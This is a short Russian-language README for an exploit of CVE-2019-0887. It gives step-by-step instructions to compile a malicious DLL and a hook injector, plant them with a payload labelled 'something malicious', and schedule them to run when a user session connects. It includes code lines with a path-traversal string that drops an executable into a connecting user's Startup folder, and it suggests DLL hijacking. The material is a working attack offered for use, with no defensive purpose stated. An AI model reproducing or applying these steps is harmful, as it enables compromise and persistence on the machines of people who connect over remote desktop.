
exp for CVE-2019-0887
Скомпилируйте CVE-2019-0887, переименуйте в winhlp.dll
Скомпилируйте Install_Hook, переименуйте в hook.exe
будьте осторожны, их нужно компилировать под x64
Поместите их в атакуемую систему, вот так:
c:\windows\hook.exe
c:\windows\winhlp.dll
c:\windows\winhlp64.exe # что-то зловредное
Если кто-то захочет изменить путь, вот соответствующие места:
# CVE-2019-0887/dllmain.cpp
WCHAR evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };
# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");
Возможно, используйте taskschd.msc для создания плана задач, установите триггер «При подключении к сеансу пользователя» и укажите путь к hook.exe.
Ждите, пока кто-то подключится к вашей атакуемой системе, скопирует что-нибудь, и... уязвимость сработает.
Совет: почему бы не использовать DLL-хайджек?